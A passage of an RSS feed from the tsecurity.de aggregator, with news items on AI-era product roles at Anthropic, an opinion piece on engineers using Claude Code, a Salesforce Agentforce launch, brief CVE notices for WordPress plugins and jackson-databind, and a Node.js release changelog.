<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>앤트로픽에서 AI 코딩 도구 클로드 코드 개발을 주도하고 관련 팀을 총괄하는 <a href="https://www.linkedin.com/in/bcherny/" target="_blank" rel="nofollow">보리스 체르니</a>(Boris Cherny)는 28일 <a href="https://x.com/bcherny/status/2071379474277613732" target="_blank" rel="nofollow">X를 통해</a> 내부 제품 조직을 관찰한 결과를 바탕으로 미래 제품 조직의 다섯 가지 핵심 역할을 제시했다.</p>



<p>첫 번째는 ‘프로토타이퍼(Prototyper)’다. 새로운 아이디어를 끊임없이 발굴하고 빠르게 실험하는 역할이다. 수많은 아이디어를 만들어내지만 실제 제품으로 이어지는 것은 일부에 그친다.</p>



<p>두 번째는 ‘빌더(Builder)’다. 프로토타입이나 아이디어를 빠르게 실제 서비스 수준의 제품과 인프라로 구현하는 역할이다.</p>



<p>세 번째는 ‘스위퍼(Sweeper)’다. 사용자 인터페이스(UI)를 다듬고 코드와 시스템을 단순화하며, 불필요한 기능을 제거하고 성능을 최적화하는 역할을 맡는다.</p>



<p>네 번째는 ‘그로워(Grower)’다. 이미 출시된 제품을 지속적으로 개선하며 제품-시장 적합성(PMF·Product-Market Fit)을 높이는 데 집중한다.</p>



<p>마지막은 ‘메인터이너(Maintainer)’다. 성숙한 시스템의 보안성과 안정성, 성능, 운영 효율성을 유지하고 서비스 확장을 책임지는 역할이다.</p>



<p>체르니는 “많은 사람은 이 가운데 두 가지 역할을 수행하고, 때로는 세 가지 역할까지 아우른다”며 “흥미로운 점은 이러한 역할이 기존 직무와는 크게 관련이 없다는 것”이라고 설명했다.</p>



<p>그는 “앤트로픽에서도 디자이너 가운데는 프로토타이퍼에 가까운 사람이 있는가 하면, 빌더나 스위퍼 역할을 수행하는 사람도 있다”며 “엔지니어, PM, 데이터 사이언티스트 역시 마찬가지”라고 덧붙였다.</p>



<p>또한 체르니는 건강한 제품 조직은 제품의 성장 단계에 따라 필요한 역할의 조합이 달라진다고 설명했다. 초기 제품에는 새로운 아이디어를 만들고 이를 빠르게 구현·정리하는 역할이 중요하다. 제품이 성장하기 시작하면 이를 지속적으로 개선해 PMF를 높이는 역할과 시스템 안정성을 유지하는 역할이 추가된다. PMF를 확보한 성숙한 제품에서는 안정성과 성능 개선, 지속적인 제품 고도화가 핵심이 되며, 새로운 기능 개발을 담당하는 역할은 일부만 필요하다는 설명이다.</p>



<p>체르니는 “어쩌면 미래의 제품 조직은 지금처럼 엔지니어, 디자이너, PM 등 직무별로 구분되기보다 이러한 역할(archetype) 중심으로 구성되는 형태에 더 가까워질지도 모른다”고 밝혔다.</p>



<p>몇몇 IT 업계 리더들도 비슷한 전망을 내놓은 바 있다. 마이크로소프트(MS) CEO 사티아 나델라는 AI 시대에는 업무 방식뿐 아니라 직무의 범위 자체가 재편되고 있다고 진단했다.</p>



<p>나델라는 2025년 공개된 <a href="https://www.youtube.com/watch?v=AUUZuzVHKdo" target="_blank" rel="nofollow">와이콤비네이터(Y Combinator)와의 대담</a>에서 MS가 보유한 링크드인을 사례로 들며 “링크드인은 기존에 별도로 운영되던 제품 디자인, 프런트엔드 엔지니어링, 제품 관리(PM) 기능을 하나의 역할인 ‘풀스택 빌더(Full-stack Builder)’로 통합하기 시작했다”고 설명했다. 그는 “이는 직무의 범위 자체가 달라지고 있다는 의미”라며 “새로운 역할과 직무 범위에 맞춰 제품팀을 어떻게 다시 설계할 것인지가 중요한 과제가 되고 있다”고 말했다.</p>



<p>나델라는 이 같은 변화가 AI 도입의 핵심 병목 중 하나인 ‘변화 관리(change management)’ 문제와 직결된다고 강조했다. 그는 “보험사, 금융사, 헬스케어 기업, 소프트웨어 기업 모두 일하는 방식 전체를 바꾸는 것”이라며 “어떤 직무인지 자체가 달라지는 것”이라고 덧붙였다.</p>



<p>메타(Meta)의 CTO 앤드루 보즈워스도 비슷한 견해를 밝혔다. 그는 2025년 자신의 인스타그램 계정을 통한 <a href="https://www.businessinsider.com/meta-cto-andrew-bosworth-predictions-ai-impact-on-software-engineering-2025-8" target="_blank" rel="nofollow">라이브 세션</a>에서 AI 도구를 완전히 습득한 개발자와 그렇지 못한 개발자 사이에 “역량의 계층화(tiering of capability)”가 심화될 것이라고 경고했다. 보즈워스는 “AI 도구를 완벽히 익혀 도구로도 대체될 수 없는 엔지니어는 프리미엄을 받게 되고, 그렇지 못한 엔지니어는 데이터 수집이나 레이블링 같은 도구 하위 계층의 작업으로 밀려나게 된다”고 말했다. 그는 “직원 수는 적지만 수십억 명의 사용자를 보유한 기업이 등장하게 될 것”이라며 AI가 소프트웨어 산업을 위축시키는 것이 아니라 오히려 성장시킬 것이라고 강조했다.<br>jihyun.lee@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Neighborhoods is a cozy upcoming city builder with a claymation art style]]></title>
<description><![CDATA[Neighborhoods is a cozy "reimagining of city sims as a city fixer" with a sweet claymation art style.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3632258/linux-tipps/neighborhoods-is-a-cozy-upcoming-city-builder-with-a-claymation-art-style/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632258/linux-tipps/neighborhoods-is-a-cozy-upcoming-city-builder-with-a-claymation-art-style/</guid>
<pubDate>Mon, 29 Jun 2026 09:56:15 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Neighborhoods is a cozy "reimagining of city sims as a city fixer" with a sweet claymation art style.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/1656156154id29294gol.webp" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/06/neighborhoods-is-a-cozy-upcoming-city-builder-with-a-claymation-art-style/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Code turned every engineer into three. Now companies need more product thinkers]]></title>
<description><![CDATA[Anthropic recently told its growth team to hire more product managers, not fewer. The reason, as reported in industry coverage, was that Claude Code had quietly turned its engineering org into a team that ships at roughly three times its actual headcount, and the bottleneck moved from the integra...]]></description>
<link>https://tsecurity.de/de/3630129/it-nachrichten/claude-code-turned-every-engineer-into-three-now-companies-need-more-product-thinkers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630129/it-nachrichten/claude-code-turned-every-engineer-into-three-now-companies-need-more-product-thinkers/</guid>
<pubDate>Sat, 27 Jun 2026 21:47:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Anthropic recently told its growth team to hire more product managers, not fewer. The reason, as reported in industry coverage, was that Claude Code had quietly turned its engineering org into a team that ships at roughly three times its actual headcount, and the bottleneck moved from the integrated development environment (IDE) to the people deciding what to build.</p><p>That detail is easy to miss in the noise of every <a href="https://venturebeat.com/orchestration/vibe-coding-can-build-your-pipeline-it-cant-explain-it-six-months-later">AI productivity claim</a>. It is also the structural shift the rest of the industry is now living through. The bottleneck in software is no longer typing. It is deciding what to type. And the engineers who treat that as someone else's problem are about to plateau. </p><p>For most of the last decade, that decision sat with someone else. <a href="https://venturebeat.com/technology/agentic-ai-solved-coding-and-exposed-every-other-problem-in-software-engineering">Software engineering</a> was a craft you absorbed slowly, then practiced in a long, predictable sequence: Dive deep on the technology, write the code, ask Stack Overflow when stuck, escalate to a senior engineer when Stack Overflow failed, ship the ticket. The product manager owned the funnel. The engineer owned the build. Both sides treated this division as physics.</p><p>Then the funnel collapsed in five steps.</p><h2><b>A short history of how the engineer's day got compressed</b></h2><p><b>The Stack Overflow era (2014 to late 2022): </b>The way engineers thought lived in one place. But new monthly questions on Stack Overflow are now down <a href="https://www.reddit.com/r/programming/comments/1hwg2px/stackoverflow_has_lost_77_of_new_questions/">roughly 77%</a> since November 2022, which was not coincidentally when ChatGPT launched. The drop is not a referendum on the site. It is a referendum on the workflow it represented.</p><p><b>The browser-tab era (late 2022 to 2024):</b> The first ChatGPT generation sat outside the IDE. Engineers ran the same loop they had always run, just with a faster oracle: Write a prompt in a browser, paste the answer back into VS Code, repeat. The work was still single-threaded and engineer-driven. The leverage was real but local.</p><p><b>The IDE-native era (2024 to 2025):</b> Cursor and Claude Code moved the model inside the editor and gave it access to the full repository. The senior-engineer escalation path largely dissolved. For years, the prevailing wisdom among veteran engineers was that Bash had the longest shelf life of any tool in the stack. By 2026, for a meaningful share of working developers, the first command typed in a fresh terminal is claude.</p><p><b>The spec-driven era (2025 to 2026):</b> Larger context windows turned single-session work into something that previously required tickets, design docs, and sprints. Amazon's Kiro IDE team reportedly compressed feature builds from two weeks to two days using the same spec-driven workflow they were shipping. An AWS engineering team described an 18-month rearchitecture, originally scoped for 30 engineers, was completed by 6 people in 76 days. The bottleneck stopped being how long it takes to write the code. It started being how clearly the team can describe what correct looks like.</p><p><b>The routines era (2026):</b> In April, Anthropic shipped Claude Code Routines: Scheduled, persistent agents that run on a cadence, on a webhook, or overnight while the laptop is closed. Cron came back. Hooks came back. The engineer's job is now part orchestration: Spin up a swarm before bed, review a stack of pull requests in the morning. Third-party wrappers like OpenClaw, which was briefly suspended by Anthropic in April before partial reinstatement, made the same point from the open-source side.</p><h2><b>The bottleneck moved; most teams have not</b></h2><p>Engineering has roughly tripled. Product management has not budged. The traditional 1:8 ratio of PMs to engineers, already strained, now plays out closer to an effective 1:20 because each engineer ships more per day. For instance, LinkedIn replaced its associate product manager track with a "Product Builder" program that trains generalists across product, design, and engineering. Anthropic is hiring more PMs, not fewer. The pattern is consistent across companies that have actually deployed agentic workflows in production: The system is producing built features faster than it is producing decisions about what should be built.</p><p>For engineers, this is the most important career signal of the decade, and the easiest one to miss while the productivity stories dominate the feed.</p><h2><b>First principles matter more, not less</b></h2><p>The instinct to declare fundamentals obsolete in the agent era gets the trend exactly wrong.</p><p>When a memory leak takes down production at 3 a.m., and the cause turns out to be a subtle ownership bug pushed 4 years ago, no agent currently in the wild closes that loop end-to-end. Operating systems, networks, concurrency, and query plans still decide who can resolve a real incident. They also decide who can spot the moments when an <a href="https://venturebeat.com/technology/why-prompt-debt-retrieval-debt-and-evaluation-debt-are-quietly-reshaping-enterprise-ai-risk">agent's output</a> looks correct on the surface and is quietly, expensively, wrong underneath. The agent that wrote 70% of the code in a modern repo cannot reliably tell anyone where its assumptions about thread safety, memory ownership, or transaction isolation diverged from the runtime. The engineer who can read the diff and catch that is the engineer the rest of the team needs in the room, and that engineer is built on fundamentals, not on prompting skill.</p><p>The corollary is that fundamentals are now a leverage skill, not a hygiene skill. In 2014, knowing how a TCP retransmit worked got a debug ticket closed faster. In 2026, the same knowledge keeps an entire agent-driven release pipeline from shipping a regression at scale. The blast radius of the engineer who knows what is happening underneath has gone up, not down.</p><h2><b>Review is the new writing</b></h2><p>Engineers in 2026 generate code at a rate that exceeds what any of them can read carefully. The team that ships fast and survives is the team whose engineers treat reviewing AI-generated code with at least the same rigor they once reserved for writing it. The 2025 <a href="https://survey.stackoverflow.co/2025">Stack Overflow developer survey</a> put 84% of developers on AI tools, with 46% saying they do not trust the output, up sharply from 31% the year before. That gap, heavy use paired with low trust, is exactly where review skills now matter most. Coders who push lots and review little are accumulating a debt that will come due during the first real incident, and the engineer who can pay it back is the one who paired their volume with deep first-principles knowledge of the systems involved.</p><h2><b>The new differentiator is the product funnel</b></h2><p>Both of those are necessary. Neither is sufficient. The engineer who matters in 2026 is the one who has stopped waiting for the funnel to arrive in the form of a Jira ticket.</p><p>That means doing things the role was historically allowed to skip.</p><p>Talk to customers. Watch how they actually use the product. Read the support queue. Sit in on the sales call. The signal a product team gets through three layers of summary, an engineer can now get firsthand in an afternoon.</p><p>Generate ideas, not just estimates. The product manager who used to source ideas for 8 engineers cannot source ideas for 20 at the same fidelity. The engineer who shows up with a validated, scoped opportunity is no longer doing the PM's job. The engineer is doing the job the new ratio requires.</p><p>Work backwards from the customer. Amazon has been writing the press release first for two decades. The discipline travels well to teams of one and to swarms of agents. Both produce a great deal of working software in the wrong direction without a clear statement of what "customer wins" means before any code is written.</p><p>Stop hiding behind bandwidth. The honest answer to "Do you have capacity for this idea?" used to be 'No.' With routines, hooks, and a cooperative agent stack, the honest answer is closer to "What is the idea worth?" That is a different conversation, and a much harder one to have without a real point of view on the customer.</p><h2><b>What the next decade rewards</b></h2><p>The five-phase history above is not really a history of tools. It is a history of which part of the job a human had to do. The part that is still human, and that will remain human for the foreseeable future, has moved up the funnel: From typing, to reviewing, to deciding, to choosing the customer to serve and the problem to solve.</p><p>The 2026 version of a <a href="https://venturebeat.com/technology/the-enterprise-risk-nobody-is-modeling-ai-is-replacing-the-very-experts-it-needs-to-learn-from">great engineer</a> is not the one who writes the most code. It is the one who knows what to build, can prove it is worth building, and has the agent fleet plus the review discipline to ship it without the system collapsing under its own velocity.</p><p>Engineers who internalize this will spend the next decade doing the most interesting work software has ever produced. Engineers who wait for a ticket will spend it watching the ticket get written by the agent next to them.</p><p><i>Ishan Gupta is a software engineer at Amazon.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-13295 | gpriday Page Builder by SiteOrigin Plugin up to 2.34.3 on WordPress panels_data cross site scripting (EUVD-2026-39955)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in gpriday Page Builder by SiteOrigin Plugin up to 2.34.3 on WordPress. The affected element is an unknown function. Such manipulation of the argument panels_data leads to cross site scripting.

This vulnerability is listed as CVE-2026-13295. ...]]></description>
<link>https://tsecurity.de/de/3629621/sicherheitsluecken/cve-2026-13295-gpriday-page-builder-by-siteorigin-plugin-up-to-2343-on-wordpress-panelsdata-cross-site-scripting-euvd-2026-39955/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629621/sicherheitsluecken/cve-2026-13295-gpriday-page-builder-by-siteorigin-plugin-up-to-2343-on-wordpress-panelsdata-cross-site-scripting-euvd-2026-39955/</guid>
<pubDate>Sat, 27 Jun 2026 15:08:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/gpriday:page_builder_by_siteorigin_plugin">gpriday Page Builder by SiteOrigin Plugin up to 2.34.3</a> on WordPress. The affected element is an unknown function. Such manipulation of the argument <em>panels_data</em> leads to cross site scripting.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-13295">CVE-2026-13295</a>. The attack may be performed from remote. There is no available exploit.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Never let the builder be its own reviewer’: The next challenge is trust, not speed of code generation]]></title>
<description><![CDATA[AI coding platforms are becoming crucial infrastructure, but governance, verification and trust are now major challenges.]]></description>
<link>https://tsecurity.de/de/3626088/it-nachrichten/never-let-the-builder-be-its-own-reviewer-the-next-challenge-is-trust-not-speed-of-code-generation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626088/it-nachrichten/never-let-the-builder-be-its-own-reviewer-the-next-challenge-is-trust-not-speed-of-code-generation/</guid>
<pubDate>Fri, 26 Jun 2026 02:17:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AI coding platforms are becoming crucial infrastructure, but governance, verification and trust are now major challenges.]]></content:encoded>
</item>
<item>
<title><![CDATA[Salesforce unveils AI Help Agent with pay-per-resolution pricing]]></title>
<description><![CDATA[Salesforce today announced Agentforce Help Agent, a new pre-packaged service agent that organizations can connect to their knowledge base to provide support to customers and employees across chat, portals, and other digital channels using text or voice. The new agent is also the first offering fr...]]></description>
<link>https://tsecurity.de/de/3624641/it-nachrichten/salesforce-unveils-ai-help-agent-with-pay-per-resolution-pricing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624641/it-nachrichten/salesforce-unveils-ai-help-agent-with-pay-per-resolution-pricing/</guid>
<pubDate>Thu, 25 Jun 2026 15:18:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.cio.com/article/3490106/salesforce-latest-news-and-insights.html">Salesforce</a> today announced Agentforce Help Agent, a new pre-packaged service agent that organizations can connect to their knowledge base to provide support to customers and employees across chat, portals, and other digital channels using text or voice. The new agent is also the first offering from Salesforce to feature a new pay-per-resolution model in which organizations only pay when the agent autonomously resolves an issue from start to finish.</p>



<p>“It’s a packaged, opinionated solution targeted at the customer service team, built on the Agentforce platform,” said Kishnan Chetan, EVP and GM of Agentforce Service at Salesforce. “Customers pay when their customers’ questions are resolved, i.e., it doesn’t get escalated to human or the customer doesn’t abandon it.”</p>



<p>Salesforce built the new service agent on experience from millions of customer service interactions. Chetan noted that tens of thousands of Salesforce customers use Agentforce across sales, marketing, and commerce, but the majority start with service. <a href="https://www.cio.com/article/4063765/lessons-learned-as-agentforce-customer-zero.html">Salesforce itself has followed that trajectory</a>. Its Help.Salesforce.com service portal has handled 4.3 million customer inquiries since release and has resolved 70% of them.</p>



<h2 class="wp-block-heading">Emphasis on usability and trust</h2>



<p>Chetan said the team has focused on making the Help Agent easy to deploy, even by business users. Users can enable voice, web, portal, and messaging channels from a single screen, allowing the agent to answer customer questions and manage cases. Users can add additional actions, including order management, appointment scheduling, and account management via existing setup options in Agentforce Builder or through a coding agent of their choice. The agent will even provision a phone number for the voice channel.</p>



<p>Because Help Agent runs on the Agentforce 360 platform, it leverages Salesforce’s Trust Layer to ensure that customer data remains protected, all agent actions are auditable, and that role-based access controls are in place.</p>



<p>Salesforce has also revamped the customer service portal experience. When an organization deploys Help Agent as a portal, it consists of a single conversation bar that surfaces personalized responses and dynamic cards through which users can complete tasks, such as ordering or scheduling an appointment, within the conversation flow.</p>



<p>“We’re bringing the search plus conversation experience in a seamless way,” Chetan explained. “I can have a single Google-type bar. When I do a search and get an answer, it’s part of a contextual conversation.”</p>



<h2 class="wp-block-heading">Pre-purchasing for resolution</h2>



<p>Under the new pay-per-resolution pricing model, customers will pay $2 per successful resolution.</p>



<p>“We define successful resolution as the user’s question doesn’t need a human escalation,” Chetan said. “If it gets escalated to a human to solve it, that’s not a resolution in our books. If the user explicitly says, ‘I didn’t get my answer,’ then that’s not a resolution.”</p>



<p>Chetan added that any actions that happen in a 10-minute window during a call and in a specific window for a chat count as a single resolution, regardless of the number of questions the agent answers. Customers can pre-purchase a packet of resolutions, with a minimum of 1,000.</p>



<p>The Agentforce Help Agent, Agentforce Customer Service Portal, and pay-per-resolution pricing are all expected to be generally available in July.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-56052 | FunnelKit Funnel Builder Plugin up to 3.15.0.5 on WordPress sql injection (EUVD-2026-38713)]]></title>
<description><![CDATA[A vulnerability was found in FunnelKit Funnel Builder Plugin up to 3.15.0.5 on WordPress. It has been declared as critical. The impacted element is an unknown function. Executing a manipulation can lead to sql injection.

The identification of this vulnerability is CVE-2026-56052. The attack may ...]]></description>
<link>https://tsecurity.de/de/3621003/sicherheitsluecken/cve-2026-56052-funnelkit-funnel-builder-plugin-up-to-31505-on-wordpress-sql-injection-euvd-2026-38713/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621003/sicherheitsluecken/cve-2026-56052-funnelkit-funnel-builder-plugin-up-to-31505-on-wordpress-sql-injection-euvd-2026-38713/</guid>
<pubDate>Wed, 24 Jun 2026 12:36:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/funnelkit:funnel_builder_plugin">FunnelKit Funnel Builder Plugin up to 3.15.0.5</a> on WordPress. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. The impacted element is an unknown function. Executing a manipulation can lead to sql injection.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-56052">CVE-2026-56052</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-54513 | FasterXML jackson-databind up to 2.18.7/2.21.3/3.1.3 EvilType[] incomplete blacklist (ID 5981 / EUVD-2026-38593)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in FasterXML jackson-databind up to 2.18.7/2.21.3/3.1.3. This vulnerability affects the function BasicPolymorphicTypeValidator.Builder.allowIfSubTypeIsArray. The manipulation of the argument EvilType[] leads to incomplete blacklist.

This vulne...]]></description>
<link>https://tsecurity.de/de/3620025/sicherheitsluecken/cve-2026-54513-fasterxml-jackson-databind-up-to-21872213313-eviltype-incomplete-blacklist-id-5981-euvd-2026-38593/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620025/sicherheitsluecken/cve-2026-54513-fasterxml-jackson-databind-up-to-21872213313-eviltype-incomplete-blacklist-id-5981-euvd-2026-38593/</guid>
<pubDate>Wed, 24 Jun 2026 03:52:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/fasterxml:jackson-databind">FasterXML jackson-databind up to 2.18.7/2.21.3/3.1.3</a>. This vulnerability affects the function <code>BasicPolymorphicTypeValidator.Builder.allowIfSubTypeIsArray</code>. The manipulation of the argument <em>EvilType[]</em> leads to incomplete blacklist.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-54513">CVE-2026-54513</a>. The attack may be initiated remotely. There is no available exploit.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[2026-06-23, Version 24.18.0 'Krypton' (LTS), @richardlau prepared by @sxa]]></title>
<description><![CDATA[Notable Changes

[e07e7a31e1] - crypto: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) #63527
[44c8ebcbd6] - http: avoid stream listeners on idle agent sockets (Matteo Collina) #64004
[d3ef4122ee] - (SEMVER-MINOR) buffer: increase Buffer.poolSize default to 64 KiB (Matteo Collina) #...]]></description>
<link>https://tsecurity.de/de/3619855/downloads/2026-06-23-version-24180-krypton-lts-richardlau-prepared-by-sxa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619855/downloads/2026-06-23-version-24180-krypton-lts-richardlau-prepared-by-sxa/</guid>
<pubDate>Wed, 24 Jun 2026 01:16:44 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Notable Changes</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/e07e7a31e1"><code>e07e7a31e1</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63527/hovercard">#63527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44c8ebcbd6"><code>44c8ebcbd6</code></a>] - <strong>http</strong>: avoid stream listeners on idle agent sockets (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64004" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64004/hovercard">#64004</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d3ef4122ee"><code>d3ef4122ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>buffer</strong>: increase Buffer.poolSize default to 64 KiB (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63597" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63597/hovercard">#63597</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb2857b85a"><code>bb2857b85a</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: align key argument names in docs and error messages (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b9d5e87880"><code>b9d5e87880</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: accept key data in crypto.diffieHellman() and cleanup DH jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ccd756d61e"><code>ccd756d61e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: add TurboSHAKE and KangarooTwelve Web Cryptography algorithms (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62183" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62183/hovercard">#62183</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9251fc09"><code>4c9251fc09</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>http</strong>: add writeInformation to send arbitrary 1xx status codes (Tim Perry) <a href="https://github.com/nodejs/node/pull/63155" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63155/hovercard">#63155</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8c989ec4a3"><code>8c989ec4a3</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>inspector</strong>: expose precise coverage start to JS runtime (sangwook) <a href="https://github.com/nodejs/node/pull/63079" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63079/hovercard">#63079</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f54c8ba32"><code>3f54c8ba32</code></a>] - <em><strong>Revert</strong></em> "<strong>stream</strong>: noop pause/resume on destroyed streams" (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/63834" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63834/hovercard">#63834</a></li>
</ul>
<h3>Commits</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/d3ef4122ee"><code>d3ef4122ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>buffer</strong>: increase Buffer.poolSize default to 64 KiB (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63597" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63597/hovercard">#63597</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9ff36e40f0"><code>9ff36e40f0</code></a>] - <strong>build</strong>: add --enable-all-experimentals build flag (Paolo Insogna) <a href="https://github.com/nodejs/node/pull/62755" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62755/hovercard">#62755</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7c22ee23aa"><code>7c22ee23aa</code></a>] - <strong>build</strong>: def <code>NODE_USE_NODE_CODE_CACHE</code> only used in node_mksnapshot (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63588" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63588/hovercard">#63588</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2551abdb4a"><code>2551abdb4a</code></a>] - <strong>build,win</strong>: enable x64 PGO (Stefan Stojanovic) <a href="https://github.com/nodejs/node/pull/62761" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62761/hovercard">#62761</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e8a55ce9b1"><code>e8a55ce9b1</code></a>] - <strong>crypto</strong>: strengthen argument CHECKs in TurboSHAKE (Tobias Nießen) <a href="https://github.com/nodejs/node/pull/62763" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62763/hovercard">#62763</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ae61cd68f3"><code>ae61cd68f3</code></a>] - <strong>crypto</strong>: harden WebCrypto against prototype pollution (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3d05a1d396"><code>3d05a1d396</code></a>] - <strong>crypto</strong>: pass CryptoKey handles to KDF jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f9d10a3f6b"><code>f9d10a3f6b</code></a>] - <strong>crypto</strong>: remove async from WebCrypto methods (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e431d93e9e"><code>e431d93e9e</code></a>] - <strong>crypto</strong>: add WebCrypto CryptoJob mode (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/56e2505e48"><code>56e2505e48</code></a>] - <strong>crypto</strong>: wire ML-DSA and ML-KEM for use when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
